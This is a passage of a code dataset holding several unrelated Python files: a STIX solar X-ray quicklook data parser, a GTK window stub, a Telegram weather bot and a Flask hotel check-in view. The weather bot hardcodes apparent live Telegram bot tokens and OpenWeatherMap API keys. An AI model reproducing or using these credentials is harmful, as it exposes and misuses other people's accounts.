20, 'energy_edge': 36, 'e_lower': 36.0, 'e_upper': 40.0, 'bin_width': 4.0,\n 'dE_E': 0.105, 'ql_channel': 3},\n 21: {'channel_edge': 21, 'energy_edge': 40, 'e_lower': 40.0, 'e_upper': 45.0, 'bin_width': 5.0,\n 'dE_E': 0.118, 'ql_channel': 3},\n 22: {'channel_edge': 22, 'energy_edge': 45, 'e_lower': 45.0, 'e_upper': 50.0, 'bin_width': 5.0,\n 'dE_E': 0.105, 'ql_channel': 3},\n 23: {'channel_edge': 23, 'energy_edge': 50, 'e_lower': 50.0, 'e_upper': 56.0, 'bin_width': 6.0,\n 'dE_E': 0.113, 'ql_channel': 4},\n 24: {'channel_edge': 24, 'energy_edge': 56, 'e_lower': 56.0, 'e_upper': 63.0, 'bin_width': 7.0,\n 'dE_E': 0.118, 'ql_channel': 4},\n 25: {'channel_edge': 25, 'energy_edge': 63, 'e_lower': 63.0, 'e_upper': 70.0, 'bin_width': 7.0,\n 'dE_E': 0.105, 'ql_channel': 4},\n 26: {'channel_edge': 26, 'energy_edge': 70, 'e_lower': 70.0, 'e_upper': 76.0, 'bin_width': 6.0,\n 'dE_E': 0.082, 'ql_channel': 4},\n 27: {'channel_edge': 27, 'energy_edge': 76, 'e_lower': 76.0, 'e_upper': 84.0, 'bin_width': 8.0,\n 'dE_E': 0.100, 'ql_channel': 4},\n 28: {'channel_edge': 28, 'energy_edge': 84, 'e_lower': 84.0, 'e_upper': 100.0,\n 'bin_width': 16.0, 'dE_El': 0.174, 'ql_channel': 4},\n 29: {'channel_edge': 29, 'energy_edge': 100, 'e_lower': 100.0, 'e_upper': 120.0,\n 'bin_width': 20.0, 'dE_El': 0.182, 'ql_channel': 4},\n 30: {'channel_edge': 30, 'energy_edge': 120, 'e_lower': 120.0, 'e_upper': 150.0,\n 'bin_width': 30.0, 'dE_El': 0.222, 'ql_channel': 4},\n 31: {'channel_edge': 31, 'energy_edge': 150, 'e_lower': 150.0, 'e_upper': np.inf,\n 'bin_width': np.inf, 'dE_E': np.inf, 'ql_channel': None}\n}\n\n\nclass Control(QTable):\n\n def __repr__(self):\n return f'<{self.__class__.__name__} \\n {super().__repr__()}>'\n\n def _get_time(self):\n # Replicate packet time for each sample\n base_times = Time(list(chain(\n *[[scet_to_datetime(f'{self[\"scet_coarse\"][i]}:{self[\"scet_fine\"][i]}')]\n * n for i, n in enumerate(self['num_samples'])])))\n # For each sample generate sample number and multiply by duration and apply unit\n start_delta = np.hstack(\n [(np.arange(ns) * it) for ns, it in self[['num_samples', 'integration_time']]])\n # hstack op loses unit\n start_delta = start_delta.value * self['integration_time'].unit\n\n duration = np.hstack([np.ones(num_sample) * int_time for num_sample, int_time in\n self[['num_samples', 'integration_time']]])\n duration = duration.value * self['integration_time'].unit\n\n # TODO Write out and simplify\n end_delta = start_delta + duration\n\n # Add the delta time to base times and convert to relative from start time\n times = base_times + start_delta + (end_delta - start_delta) / 2\n # times -= times[0]\n return times, duration\n\n @classmethod\n def from_packets(cls, packets):\n # Header\n control = cls()\n # self.energy_bin_mask = None\n # self.samples = None\n control['scet_coarse'] = np.array(packets['NIX00445'], np.uint32)\n # Not all QL data have fine time in TM default to 0 if no present\n scet_fine = packets.get('NIX00446')\n if scet_fine:\n control['scet_fine'] = np.array(scet_fine, np.uint32)\n else:\n control['scet_fine'] = np.zeros_like(control['scet_coarse'], np.uint32)\n\n integration_time = packets.get('NIX00405')\n if integration_time:\n control['integration_time'] = (np.array(integration_time, np.float) + 1) * 0.1 * u.s\n else:\n control['integration_time'] = np.zeros_like(control['scet_coarse'], np.float) * u.s\n\n # control = unique(control)\n control['index'] = np.arange(len(control))\n\n return control\n\n\nclass Data(QTable):\n def __repr__(self):\n return f'<{self.__class__.__name__} \\n {super().__repr__()}>'\n\n @classmethod\n def from_packets(cls, packets):\n raise NotImplementedError\n\n\nclass Product:\n def __init__(self, control, data):\n \"\"\"\n Generic product compose of control and data\n Parameters\n ----------\n control : stix_parser.products.quicklook.Control\n Table containing control information\n data : stix_parser.products.quicklook.Data\n Table containing data\n \"\"\"\n self.type = 'ql'\n self.control = control\n self.data = data\n\n self.obs_beg = self.data['time'][0] - self.control['integration_time'][0] / 2\n self.obs_end = self.data['time'][-1] + self.control['integration_time'][-1] / 2\n self.obs_avg = self.obs_beg + (self.obs_end - self.obs_beg) / 2\n\n def __add__(self, other):\n \"\"\"\n Combine two products stacking data along columns and removing duplicated data using time as\n the primary key.\n\n Parameters\n ----------\n other : A subclass of stix_parser.products.quicklook.Product\n\n Returns\n -------\n A subclass of stix_parser.products.quicklook.Product\n The combined data product\n \"\"\"\n if not isinstance(other, type(self)):\n raise TypeError(f'Products must of same type not {type(self)} and {type(other)}')\n\n # TODO reindex and update data control_index\n other.control['index'] = other.control['index'] + self.control['index'].max() + 1\n control = vstack((self.control, other.control))\n # control = unique(control, keys=['scet_coarse', 'scet_fine'])\n # control = control.group_by(['scet_coarse', 'scet_fine'])\n\n other.data['control_index'] = other.data['control_index'] + self.control['index'].max() + 1\n data = vstack((self.data, other.data))\n data = unique(data, keys='time')\n # data = data.group_by('time')\n unique_control_inds = np.unique(data['control_index'])\n control = control[np.isin(control['index'], unique_control_inds)]\n\n return type(self)(control, data)\n\n def __repr__(self):\n return f'<{self.__class__.__name__}\\n' \\\n f' {self.control.__repr__()}\\n' \\\n f' {self.data.__repr__()}\\n' \\\n f'>'\n\n def to_days(self):\n days = set([(t.year, t.month, t.day) for t in self.data['time'].to_datetime()])\n date_ranges = [(datetime(*day), datetime(*day) + timedelta(days=1)) for day in days]\n for dstart, dend in date_ranges:\n i = np.where((self.data['time'] >= dstart) &\n (self.data['time'] < dend))\n\n data = self.data[i]\n control_indices = np.unique(data['control_index'])\n control = self.control[np.isin(self.control['index'], control_indices)]\n control_index_min = control_indices.min()\n\n data['control_index'] = data['control_index'] - control_index_min\n control['index'] = control['index'] - control_index_min\n yield type(self)(control=control, data=data)\n\n @classmethod\n def from_packets(cls, packets, eng_packets):\n control = Control.from_packets(packets)\n data = Data.from_packets(packets)\n return cls(control, data)\n\n @classmethod\n def from_fits(cls, fitspath):\n header = fits.getheader(fitspath)\n control = QTable.read(fitspath, hdu='CONTROL')\n data = QTable.read(fitspath, hdu='DATA')\n obs_beg = Time(header['DATE_OBS'])\n data['time'] = (data['time'] + obs_beg)\n return cls(control=control, data=data)\n\n def get_energies(self):\n if 'energy_bin_edge_mask' in self.control.colnames:\n energies = get_energies_from_mask(self.control['energy_bin_edge_mask'][0])\n elif 'energy_bin_mask' in self.control.colnames:\n energies = get_energies_from_mask(self.control['energy_bin_mask'][0])\n else:\n energies = get_energies_from_mask()\n\n return energies\n\n\nclass LightCurve(Product):\n \"\"\"\n Quick Look Light Curve data product.\n \"\"\"\n def __init__(self, control=None, data=None):\n super().__init__(control=control, data=data)\n self.name = 'lightcurve'\n self.level = 'L1A'\n\n @classmethod\n def from_packets(cls, packets, eng_packets):\n control = Control.from_packets(packets)\n control['detector_mask'] = _get_detector_mask(packets)\n control['pixel_mask'] = _get_pixel_mask(packets)\n control['energy_bin_edge_mask'] = _get_energy_bins(packets, 'NIX00266', 'NIXD0107')\n control['compression_scheme_counts_skm'] = \\\n _get_compression_scheme(packets, 'NIXD0101', 'NIXD0102', 'NIXD0103')\n control['compression_scheme_triggers_skm'] = \\\n _get_compression_scheme(packets, 'NIXD0104', 'NIXD0105', 'NIXD0106')\n control['num_energies'] = _get_num_energies(packets)\n control['num_samples'] = np.array(packets['NIX00271'])[\n np.cumsum(control['num_energies']) - 1]\n\n time, duration = control._get_time()\n # Map a given entry back to the control info through index\n control_indices = np.hstack([np.full(ns, cind) for ns, cind in\n control[['num_samples', 'index']]])\n\n cs, ck, cm = control['compression_scheme_counts_skm'][0]\n counts, counts_var = decompress(packets['NIX00272'], s=cs, k=ck, m=cm, return_variance=True)\n\n ts, tk, tm = control['compression_scheme_triggers_skm'][0]\n triggers, triggers_var = decompress(packets['NIX00274'], s=ts, k=tk, m=tm,\n return_variance=True)\n\n flat_indices = np.hstack((0, np.cumsum([*control['num_samples']]) *\n control['num_energies'])).astype(int)\n counts_reformed = [\n np.array(counts[flat_indices[i]:flat_indices[i + 1]]).reshape(n_eng, n_sam)\n for i, (n_sam, n_eng) in enumerate(control[['num_samples', 'num_energies']])]\n\n counts_var_reformed = [\n np.array(counts_var[flat_indices[i]:flat_indices[i + 1]]).reshape(n_eng, n_sam)\n for i, (n_sam, n_eng) in enumerate(control[['num_samples', 'num_energies']])]\n\n counts = np.hstack(counts_reformed).T\n counts_var = np.hstack(counts_var_reformed).T\n\n data = Data()\n data['control_index'] = control_indices\n data['time'] = time\n data['timedel'] = duration\n data['triggers'] = triggers\n data['triggers_err'] = np.sqrt(triggers_var)\n data['rcr'] = packets['NIX00276']\n data['counts'] = counts * u.ct\n data['counts_err'] = np.sqrt(counts_var) * u.ct\n\n return cls(control=control, data=data)\n\n def __repr__(self):\n return f'{self.name}, {self.level}\\n' \\\n f'{self.obs_beg.fits}, {self.obs_end}\\n ' \\\n f'{len(self.control)}, {len(self.data)}'\n\n\nclass Background(Product):\n \"\"\"\n Background product.\n \"\"\"\n\n def __init__(self, control, data):\n super().__init__(control=control, data=data)\n self.name = 'background'\n self.level = 'L1A'\n\n @classmethod\n def from_packets(cls, packets, eng_packets):\n control = Control.from_packets(packets)\n\n # Control\n control['energy_bin_mask'] = _get_energy_bins(packets, 'NIX00266', 'NIXD0111')\n control['compression_scheme_background_skm'] = _get_compression_scheme(packets, 'NIXD0108',\n 'NIXD0109',\n 'NIXD0110')\n control['compression_scheme_triggers_skm'] = _get_compression_scheme(packets, 'NIXD0112',\n 'NIXD0113', 'NIXD0114')\n\n control['num_energies'] = _get_num_energies(packets)\n control['num_samples'] = np.array(packets['NIX00277'])[\n np.cumsum(control['num_energies']) - 1]\n\n time, duration = control._get_time()\n # Map a given entry back to the control info through index\n control_indices = np.hstack([np.full(ns, cind) for ns, cind in\n control[['num_samples', 'index']]])\n\n # Data\n bs, bk, bm = control['compression_scheme_background_skm'][0]\n counts, counts_var = decompress(packets['NIX00278'], s=bs, k=bk, m=bm, return_variance=True)\n\n flat_indices = np.hstack((0, np.cumsum([*control['num_samples']]) *\n control['num_energies'])).astype(int)\n\n counts_reformed = [\n np.array(counts[flat_indices[i]:flat_indices[i + 1]]).reshape(n_eng, n_sam)\n for i, (n_sam, n_eng) in enumerate(control[['num_samples', 'num_energies']])]\n\n counts_var_reformed = [\n np.array(counts_var[flat_indices[i]:flat_indices[i + 1]]).reshape(n_eng, n_sam)\n for i, (n_sam, n_eng) in enumerate(control[['num_samples', 'num_energies']])]\n\n counts = np.hstack(counts_reformed).T\n counts_var = np.hstack(counts_var_reformed).T\n\n ts, tk, tm = control['compression_scheme_triggers_skm'][0]\n triggers, triggers_var = decompress(packets['NIX00274'], s=ts, k=tk, m=tm,\n return_variance=True)\n\n data = Data()\n data['control_index'] = control_indices\n data['time'] = time\n data['timedel'] = duration\n data['background'] = counts * u.ct\n data['background_err'] = np.sqrt(counts_var) * u.ct\n data['triggers'] = triggers\n data['triggers_err'] = np.sqrt(triggers_var)\n\n return cls(control=control, data=data)\n\n\nclass Spectra(Product):\n \"\"\"\n Spectra product.\n \"\"\"\n\n def __init__(self, control, data):\n super().__init__(control=control, data=data)\n self.name = 'spectra'\n self.level = 'L1A'\n\n @classmethod\n def from_packets(cls, packets, eng_packets):\n # Header\n control = Control.from_packets(packets)\n\n # Control\n control['pixel_mask'] = _get_pixel_mask(packets)\n control['compression_scheme_spectra_skm'] = _get_compression_scheme(packets, 'NIXD0115',\n 'NIXD0116', 'NIXD0117')\n control['compression_scheme_triggers_skm'] = _get_compression_scheme(packets, 'NIXD0112',\n 'NIXD0113', 'NIXD0114')\n # Fixed for spectra\n num_energies = 32\n control['num_energies'] = num_energies\n control['num_samples'] = np.array(packets['NIX00089'])\n\n # Due to the way packets are split up full contiguous block of detector 1-32 are not always\n # down-linked to the ground so need to pad the array to write to table and later fits\n total_samples = control['num_samples'].sum()\n full, partial = divmod(total_samples, 32)\n pad_after = 0\n if partial != 0:\n pad_after = 32 - partial\n\n control_indices = np.pad(np.hstack([np.full(ns, cind) for ns, cind in\n control[['num_samples', 'index']]]), (0, pad_after),\n constant_values=-1)\n control_indices = control_indices.reshape(-1, 32)\n\n duration, time = cls._get_time(control, num_energies, packets, pad_after)\n\n # sample x detector x energy\n # counts = np.array([eng_packets.get('NIX00{}'.format(i)) for i in range(452, 484)],\n # np.uint32).T * u.ct\n ss, sk, sm = control['compression_scheme_spectra_skm'][0]\n counts, counts_var = zip(\n *[decompress(packets.get('NIX00{}'.format(i)), s=ss, k=sk, m=sm, return_variance=True)\n for i in range(452, 484)])\n counts = np.vstack(counts).T\n counts_var = np.vstack(counts_var).T\n\n counts = np.pad(counts, ((0, pad_after), (0, 0)), constant_values=0)\n counts_var = np.pad(counts_var, ((0, pad_after), (0, 0)), constant_values=0)\n\n ts, tk, tm = control['compression_scheme_triggers_skm'][0]\n triggers, triggers_var = decompress(packets.get('NIX00484'), s=ts, k=tk, m=tm,\n return_variance=True)\n\n triggers = np.pad(triggers, (0, pad_after), constant_values=0)\n triggers_var = np.pad(triggers_var, (0, pad_after), constant_values=0)\n\n detector_index = np.pad(np.array(packets.get('NIX00100'), np.int16), (0, pad_after),\n constant_values=-1)\n num_integrations = np.pad(np.array(packets.get('NIX00485'), np.uint16), (0, pad_after),\n constant_values=0)\n\n # Data\n data = Data()\n data['control_index'] = control_indices[:, 0]\n data['time'] = time[:, 0]\n data['timedel'] = duration[:, 0]\n data['detector_index'] = detector_index.reshape(-1, 32) * u.ct\n data['spectra'] = counts.reshape(-1, 32, num_energies) * u.ct\n data['spectra_err'] = np.sqrt(counts_var.reshape(-1, 32, num_energies))\n data['triggers'] = triggers.reshape(-1, num_energies)\n data['triggers_err'] = np.sqrt(triggers_var.reshape(-1, num_energies))\n data['num_integrations'] = num_integrations.reshape(-1, num_energies)\n\n return cls(control=control, data=data)\n\n @classmethod\n def _get_time(cls, control, num_energies, packets, pad_after):\n times = []\n durations = []\n start = 0\n for i, (ns, it) in enumerate(control['num_samples', 'integration_time']):\n off_sets = np.array(packets.get('NIX00485')[start:start + ns]) * it\n base_time = Time(scet_to_datetime(\n f'{control[\"scet_coarse\"][i]}:{control[\"scet_fine\"][i]}'))\n start_times = base_time + off_sets\n end_times = base_time + off_sets + it\n cur_time = start_times + (end_times - start_times) / 2\n times.extend(cur_time)\n durations.extend([it]*ns)\n start += ns\n time = Time(times)\n time = Time(np.pad(time.datetime64, (0, pad_after), constant_values=time[-1].datetime64))\n time = time.reshape(-1, num_energies)\n duration = np.pad(np.hstack(durations), (0, pad_after)).reshape(-1, num_energies) * it.unit\n return duration, time\n\n\nclass Variance(Product):\n \"\"\"\n Variance product.\n \"\"\"\n def __init__(self, control, data):\n super().__init__(control=control, data=data)\n self.name = 'variance'\n self.level = 'L1A'\n\n @classmethod\n def from_packets(cls, packets, eng_packets):\n # Header\n control = Control.from_packets(packets)\n\n # Control\n control['samples_per_variance'] = np.array(packets.get('NIX00279'), np.ubyte)\n control['pixel_mask'] = _get_pixel_mask(packets)\n control['detector_mask'] = _get_detector_mask(packets)\n control['compression_scheme_variance_skm'] = _get_compression_scheme(packets, 'NIXD0118',\n 'NIXD0119', 'NIXD0120')\n energy_masks = np.array([\n [bool(int(x)) for x in format(packets.get('NIX00282')[i], '032b')]\n for i in range(len(packets.get('NIX00282')))])\n\n control['energy_bin_mask'] = energy_masks\n control['num_energies'] = 1\n control['num_samples'] = packets.get('NIX00280')\n\n time, duration = control._get_time()\n # Map a given entry back to the control info through index\n control_indices = np.hstack([np.full(ns, cind) for ns, cind in\n control[['num_samples', 'index']]])\n\n vs, vk, vm = control['compression_scheme_variance_skm'][0]\n variance, variance_var = decompress(packets.get('NIX00281'), s=vs, k=vk, m=vm,\n return_variance=True)\n\n # Data\n data = Data()\n data['time'] = time\n data['timedel'] = duration\n data['control_index'] = control_indices\n data['variance'] = variance\n data['variance_err'] = np.sqrt(variance_var)\n\n return cls(control=control, data=data)\n\n\nclass CalibrationSpectra(Product):\n \"\"\"\n Calibration Spectra data product.\n \"\"\"\n def __init__(self, control, data):\n super().__init__(control=control, data=data)\n self.name = 'calibration_spectrum'\n self.level = 'L1A'\n\n @classmethod\n def from_packets(cls, packets, eng_packets):\n control = Control.from_packets(packets)\n\n control['integration_time'] = (np.array(packets['NIX00122'], np.uint32) + 1) * 0.1 * u.s\n # control['obs_beg'] = control['obs_utc']\n # control['.obs_end'] = control['obs_beg'] + timedelta(seconds=control['duration'].astype('float'))\n # control['.obs_avg'] = control['obs_beg'] + (control['obs_end'] - control['obs_beg']) / 2\n\n # Control\n control['quiet_time'] = np.array(packets['NIX00123'], np.uint16)\n control['live_time'] = np.array(packets['NIX00124'], np.uint32)\n control['average_temperature'] = np.array(packets['NIX00125'], np.uint16)\n control['detector_mask'] = _get_detector_mask(packets)\n control['pixel_mask'] = _get_pixel_mask(packets)\n control['subspectrum_mask'] = _get_sub_spectrum_mask(packets)\n control['compression_scheme_counts_skm'] = _get_compression_scheme(packets, 'NIXD0126',\n 'NIXD0127', 'NIXD0128')\n subspec_data = {}\n j = 129\n for subspec, i in enumerate(range(300, 308)):\n subspec_data[subspec + 1] = {'num_points': packets.get(f'NIXD0{j}')[0],\n 'num_summed_channel': packets.get(f'NIXD0{j + 1}')[0],\n 'lowest_channel': packets.get(f'NIXD0{j + 2}')[0]}\n j += 3\n\n control['num_samples'] = np.array(packets.get('NIX00159'), np.uint16)\n # control.remove_column('index')\n # control = unique(control)\n # control['index'] = np.arange(len(control))\n\n control['subspec_num_points'] = np.array(\n [v['num_points'] for v in subspec_data.values()]).reshape(1, -1)\n control['subspec_num_summed_channel'] = np.array(\n [v['num_summed_channel'] for v in subspec_data.values()]).reshape(1, -1)\n control['subspec_lowest_channel'] = np.array(\n [v['lowest_channel'] for v in subspec_data.values()]).reshape(1, -1)\n\n subspec_index = np.argwhere(control['subspectrum_mask'][0].flatten() == 1)\n num_sub_spectra = control['subspectrum_mask'].sum(axis=1)\n sub_channels = [np.arange(control['subspec_num_points'][0, index] + 1)\n * (control['subspec_num_summed_channel'][0, index] + 1)\n + control['subspec_lowest_channel'][0, index] for index in subspec_index]\n channels = list(chain(*[ch.tolist() for ch in sub_channels]))\n control['num_channels'] = len(channels)\n\n # Data\n data = Data()\n data['control_index'] = [0]\n data['time'] = (Time(scet_to_datetime(f\"{control['scet_coarse'][0]}\"\n f\":{control['scet_fine'][0]}\"))\n + control['integration_time'][0]/2).reshape(1)\n data['timedel'] = control['integration_time'][0]\n # data['detector_id'] = np.array(packets.get('NIXD0155'), np.ubyte)\n # data['pixel_id'] = np.array(packets.get('NIXD0156'), np.ubyte)\n # data['subspec_id'] = np.array(packets.get('NIXD0157'), np.ubyte)\n num_spec_points = np.array(packets.get('NIX00146'))\n\n cs, ck, cm = control['compression_scheme_counts_skm'][0]\n counts, counts_var = decompress(packets.get('NIX00158'), s=cs, k=ck, m=cm,\n return_variance=True)\n\n\n counts_rebinned = np.apply_along_axis(rebin_proportional, 1,\n counts.reshape(-1, len(channels)), channels,\n np.arange(1025))\n\n counts_var_rebinned = np.apply_along_axis(rebin_proportional, 1,\n counts_var.reshape(-1, len(channels)), channels,\n np.arange(1025))\n\n dids = np.array(packets.get('NIXD0155'), np.ubyte).reshape(-1, num_sub_spectra[0])[:, 0]\n pids = np.array(packets.get('NIXD0156'), np.ubyte).reshape(-1, num_sub_spectra[0])[:, 0]\n\n full_counts = np.zeros((32, 12, 1024))\n full_counts[dids, pids] = counts_rebinned\n full_counts_var = np.zeros((32, 12, 1024))\n full_counts_var[dids, pids] = counts_var_rebinned\n data['counts'] = full_counts.reshape((1, *full_counts.shape))\n data['counts_err'] = np.sqrt(full_counts_var).reshape((1, *full_counts_var.shape))\n\n return cls(control=control, data=data)\n\n\nclass FlareFlagAndLocation(Product):\n \"\"\"\n Flare flag and location product\n \"\"\"\n def __init__(self, control, data):\n super().__init__(control=control, data=data)\n self.name = 'flareflag'\n self.level = 'L1A'\n\n @classmethod\n def from_packets(cls, packets):\n control = Control.from_packets(packets)\n control['num_samples'] = packets.get('NIX00089')\n\n control_indices = np.hstack([np.full(ns, cind) for ns, cind in\n control[['num_samples', 'index']]])\n\n time, duration = control._get_time()\n\n # DATA\n data = Data()\n data['control_index'] = control_indices\n data['time'] = time\n data['duration'] = duration\n data['loc_z'] = np.array(packets['NIX00283'], np.int16)\n data['loc_y'] = np.array(packets['NIX00284'], np.int16)\n data['thermal_index'] = np.array(packets['NIXD0061'], np.uint16)\n data['non_thermal_index'] = np.array(packets['NIXD0060'], np.uint16)\n data['location_status'] = np.array(packets['NIXD0059'], np.uint16)\n\n return cls(control=control, data=data)\n\n\nclass TMManagementAndFlareList(Product):\n \"\"\"\n TM Management and Flare list product.\n \"\"\"\n def __init__(self, control, data):\n super().__init__(control=control, data=data)\n self.name = 'flareflag'\n self.level = 'L1A'\n\n @classmethod\n def from_packets(cls, packets, eng_packets):\n tmp = QTable()\n tmp['scet_coarse'] = packets['coarse_time']\n tmp['scet_fine'] = packets['coarse_time']\n control = Control(tmp)\n data = Data()\n if 'parameters' in packets:\n\n control['ubsd_counter'] = packets.get('NIX00285')[0]\n control['pald_counter'] = packets.get('NIX00286')[0]\n control['num_samples'] = packets.get('NIX00286')[0]\n\n # DATA\n data['start_scet_coarse'] = packets.get('NIX00287')\n data['end_scet_coarse'] = packets.get('NIX00287')\n data['obs_utc'] = scet_to_datetime(f\"{data['start_scet_coarse']}:0\")\n data['highest_flareflag'] = packets.get('NIX00289')[0]\n data['tm_byte_volume'] = packets.get('NIX00290')[0]\n data['average_z_loc'] = packets.get('NIX00291')[0]\n data['average_y_loc'] = packets.get('NIX00292')[0]\n data['processing_mask'] = packets.get('NIX00293')[0]\n\n return cls(control=control, data=data)\n else:\n return None\n\n\ndef get_energies_from_mask(mask=None):\n \"\"\"\n Return energy channels for\n Parameters\n ----------\n mask : list or array\n Energy bin mask\n\n Returns\n -------\n tuple\n Lower and high energy edges\n \"\"\"\n\n if mask is None:\n low = [ENERGY_CHANNELS[edge]['e_lower'] for edge in range(32)]\n high = [ENERGY_CHANNELS[edge]['e_upper'] for edge in range(32)]\n elif len(mask) == 33:\n edges = np.where(np.array(mask) == 1)[0]\n channel_edges = [edges[i:i + 2].tolist() for i in range(len(edges) - 1)]\n low = []\n high = []\n for edge in channel_edges:\n l, h = edge\n low.append(ENERGY_CHANNELS[l]['e_lower'])\n high.append(ENERGY_CHANNELS[h - 1]['e_upper'])\n elif len(mask) == 32:\n edges = np.where(np.array(mask) == 1)\n low_ind = np.min(edges)\n high_ind = np.max(edges)\n low = [ENERGY_CHANNELS[low_ind]['e_lower']]\n high = [ENERGY_CHANNELS[high_ind]['e_upper']]\n else:\n raise ValueError(f'Energy mask or edges must have a length of 32 or 33 not {len(mask)}')\n\n return low, high\n\n\ndef rebin_proportional(y1, x1, x2):\n x1 = np.asarray(x1)\n y1 = np.asarray(y1)\n x2 = np.asarray(x2)\n\n # the fractional bin locations of the new bins in the old bins\n i_place = np.interp(x2, x1, np.arange(len(x1)))\n\n cum_sum = np.r_[[0], np.cumsum(y1)]\n\n # calculate bins where lower and upper bin edges span\n # greater than or equal to one original bin.\n # This is the contribution from the 'intact' bins (not including the\n # fractional start and end parts.\n whole_bins = np.floor(i_place[1:]) - np.ceil(i_place[:-1]) >= 1.\n start = cum_sum[np.ceil(i_place[:-1]).astype(int)]\n finish = cum_sum[np.floor(i_place[1:]).astype(int)]\n\n y2 = np.where(whole_bins, finish - start, 0.)\n\n bin_loc = np.clip(np.floor(i_place).astype(int), 0, len(y1) - 1)\n\n # fractional contribution for bins where the new bin edges are in the same\n # original bin.\n same_cell = np.floor(i_place[1:]) == np.floor(i_place[:-1])\n frac = i_place[1:] - i_place[:-1]\n contrib = (frac * y1[bin_loc[:-1]])\n y2 += np.where(same_cell, contrib, 0.)\n\n # fractional contribution for bins where the left and right bin edges are in\n # different original bins.\n different_cell = np.floor(i_place[1:]) > np.floor(i_place[:-1])\n frac_left = np.ceil(i_place[:-1]) - i_place[:-1]\n contrib = (frac_left * y1[bin_loc[:-1]])\n\n frac_right = i_place[1:] - np.floor(i_place[1:])\n contrib += (frac_right * y1[bin_loc[1:]])\n\n y2 += np.where(different_cell, contrib, 0.)\n\n return y2\n","sub_path":"stix/fits/products/quicklook.py","file_name":"quicklook.py","file_ext":"py","file_size_in_byte":33879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"20083283","text":"import gi\n\ngi.require_version('Gtk','3.0')\nfrom gi.repository import Gtk\n\nclass MiVentana(Gtk.Window):\n\n\tdef __init__(self,*args,**kwargs):\n\t\tsuper(MiVentana,self).__init__(*args,**kwargs)\n\t\tself.set_default_size(500,500)\n\t\tself.connect('delete-event',Gtk.main_quit)\n\t\tself.contenedor()\n\t\tself.agregar_wigets()\n\n\n\n\tdef contenedor(self):\n\t\tself.contenedor = Gtk.Grid()\n\t\tself.contenedor.set_column_homogeneous(True)\n\t\tself.add(self.contenedor)\n\n\n\tdef agregar_wigets(self):\n\t\tself.label_user = Gtk.Label('Victoria Usuario ')\n\t\tself.contenedor.attach(self.label_user,0,0,1,1)\n\t\tself.label_maquina = Gtk.Label('Victoria Maquina')\n\t\tself.contenedor.attach(self.label_maquina,0,0,3,1)\n\n\nif __name__ == '__main__':\n\n\tventana = MiVentana()\n\tventana.show_all()\n\tGtk.main()","sub_path":"Python-gtk/juego.py","file_name":"juego.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"74790354","text":"import telebot\nimport pyowm\n\ntoken_bot_Shevnin=\"902452228:AAFxwaA2yilyGl7JppE3pwoe8545SDJ88Ns\"\nAPI_key_Shevnin='7c83d4d6fc0856c7a2ed516b47ebbabd'\n\ntoken_bot_Sim=\"971477626:AAHYok-sna2mJ-UnkEYGGLlyNhcZBZ_1h-o\"\nAPI_key_Sim='9262eaa5e82b734436f39f3e9c42f0bd'\n\nbot = telebot.TeleBot(token_bot_Shevnin)\nowm = pyowm.OWM(API_key_Shevnin, language='ru')\ndef t_9(string):\n city = string\n with open(\"citys.txt\", 'r', encoding='utf8') as citys:\n towns_list = []\n index_list = []\n maximum = 0\n for line in citys:\n towns_list.append(str(line))\n city1 = 0\n city2 = 0\n index = 0\n for i in city:\n if city[city1] == line[city2]:\n index += 1\n city1 += 1\n city2 += 1\n index_list.append(index)\n\n for i in range(len(index_list)):\n if maximum < index_list[i]:\n maximum = index_list[i]\n index = i\n towns_list = [line.rstrip() for line in towns_list]\n string_ret = towns_list[index]\n\n return string_ret\n\n@bot.message_handler(content_types=['text'])\ndef send_weather(message):\n #answer = \"Добро пожаловать в weatherbot, напиши название города в котором ты находишься \\n\"\n inputs = message.text.lower()\n inputs = inputs.title()\n print(inputs)\n inputs = t_9(inputs)\n observation = owm.weather_at_place(inputs)\n status = observation.get_weather()\n wind = status.get_wind()[\"speed\"]\n humidity = status.get_humidity()\n temp = status.get_temperature('celsius')[\"temp\"]\n if status.get_detailed_status() ==\"ясно\":\n emoji = \"☀\"\n elif status.get_detailed_status() ==\"слегка облачно\":\n emoji = \"🌤️\"\n elif status.get_detailed_status() ==\"облачно\":\n emoji = \"🌥️\"\n elif status.get_detailed_status() == \"пасмурно\":\n emoji = \"☁\"\n elif status.get_detailed_status() == \"гроза\":\n emoji = \"🌩️\"\n elif status.get_detailed_status() == \"дождь\":\n emoji = \"🌧️\"\n elif status.get_detailed_status() == \"снег\":\n emoji = \"🌨️\"\n else:\n emoji = \"🌦️\"\n\n answer = \"В городе \" + inputs + \" сейчас: \"+status.get_detailed_status() + emoji +\"\\n\"\n answer += \"Температура в районе: \" + str(round(temp)) + \"℃\"+\"\\n\"\n answer += \"Скорость ветра: \" + str(wind) + \"м/с\"+\"\\n\"\n answer += \"Влажность: \" + str(humidity) + \"%\"\n\n bot.send_message(message.chat.id, answer)\n\n\nbot.polling(none_stop = True)\n","sub_path":"teleBot.py","file_name":"teleBot.py","file_ext":"py","file_size_in_byte":2683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"616628803","text":"from flask import render_template, redirect, url_for, request, session, flash\nfrom flask import current_app as app\n\nfrom app.api.user_manager import UserManager\nfrom app.forms.checkin import CheckInForm, CheckOutForm\nfrom app.api.checkin_manager import CheckInManager\n\n\n@app.route('/checkin_and_out/checkin', methods=['GET', 'POST'])\ndef checkin():\n if 'booking_user_id' not in session or 'booking_credit_num' not in session:\n return redirect(url_for('checkin_form'))\n\n user = UserManager.get_user_by_id(session['booking_user_id'])\n credit_num = session['booking_credit_num']\n\n # An exit button should clear the session cookies!!!\n # del session['booking_user_id']\n # del session['booking_credit_num']\n\n bookings = CheckInManager.getBookings(user.details.first_name, user.details.last_name, credit_num)\n\n if request.method == 'POST':\n var = int(request.form['r_num'])\n CheckInManager.check_in(var)\n\n return render_template('checkin_and_out/AcceptCheckIn.html', bookings=bookings, user=user)\n\n\n@app.route('/checkin_and_out/checkinform', methods=['GET', 'POST'])\ndef checkin_form():\n form = CheckInForm()\n if form.validate_on_submit():\n first_name = form.first_name.data\n last_name = form.last_name.data\n credit_num = form.credit_num.data\n\n # This implementation (for unauthenticated users works)\n # An alternatice could be added for logged in users too\n bookings = CheckInManager.getBookings(first_name, last_name, credit_num)\n\n if (bookings):\n user = bookings[0].user\n session['booking_user_id'] = user.id\n session['booking_credit_num'] = credit_num\n return redirect(url_for('checkin'))\n else:\n flash('Sorry, the 